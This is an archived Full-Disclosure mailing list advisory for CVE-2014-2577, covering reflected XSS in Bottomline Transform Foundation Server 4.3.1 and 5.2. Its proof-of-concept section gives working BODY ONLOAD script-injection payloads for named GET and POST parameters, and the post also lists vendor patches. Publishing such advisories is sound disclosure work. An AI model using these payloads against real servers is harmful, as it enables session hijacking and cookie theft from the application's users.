lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 3 Jun 2014 21:04:46 +0200
From: Fran <jfrancisco.bolivar@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] [CVE-2014-2577] XSS on Transform Foundation Server 4.3.1 and
 5.2 from Bottomline Technologies

I. VULNERABILITY
-------------------------

Reflected XSS Attacks vulnerabilities in Transform Foundation server 4.3.1
and 5.2 from Bottomline Technologies


II. BACKGROUND
-------------------------

Bottomline offers powerful, next-generation electronic document solutions
for formatting,
personalizing and delivering ERP and business application output.


III. DESCRIPTION
-------------------------

Has been detected several Reflected XSS vulnerability in Transform
Foundation server 4.3.1 and 5.2


1. XSS on GET parameters:


http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn="XSS CODE"

http://XXXXXXXXXXXXX/"XSS CODE"server-status.cgi



2. XSS on POST parameters:


URL: XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp

PARAMETERS:


db="XSS CODE"
referer="XSS CODE"



IV. PROOF OF CONCEPT
-------------------------


GET:

The application does not validate the parameter "pn" correctly.


http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn=</i></p><BODY
ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>

http://XXXXXXXXXXXXX/<BODY
ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>server-status.cgi


POST:

The application does not validate the parameter "db" and "rerferer"
correctly.


XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp


db=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>

and

referer=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')


V. BUSINESS IMPACT
-------------------------

An attacker can execute arbitrary HTML or script code in a targeted
user's browser, that allows the execution of arbitrary HTML/script
code to be executed in the context of the victim user's browser
allowing Cookie Theft/Session Hijacking, thus enabling full access the
box.


VI. SYSTEMS AFFECTED
-------------------------

Transform Foundation Server 4.3.1
Transform Foundation Server 5.2


VII. SOLUTION
-------------------------

Patches released by the vendor available on customer portal and information
available here:


1. Transform Foundation Server 4.3.1 Patch 8:
http://www.pdf-archive.com/2014/06/03/tf431patch8releasenotes/preview/page/9/

SF2351630
SF2364411
SF2391461


2. Transform Foundation Server 5.2 Patch 7:

http://www.pdf-archive.com/2014/06/03/tf431patch8releasenotes/preview/page/9/


SF2351630
SF2364411
SF2391461


http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2577

Detected and reported by J. Francisco Bolivar (es.linkedin.com/in/jfbolivar/)
@Jfran_cbit

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists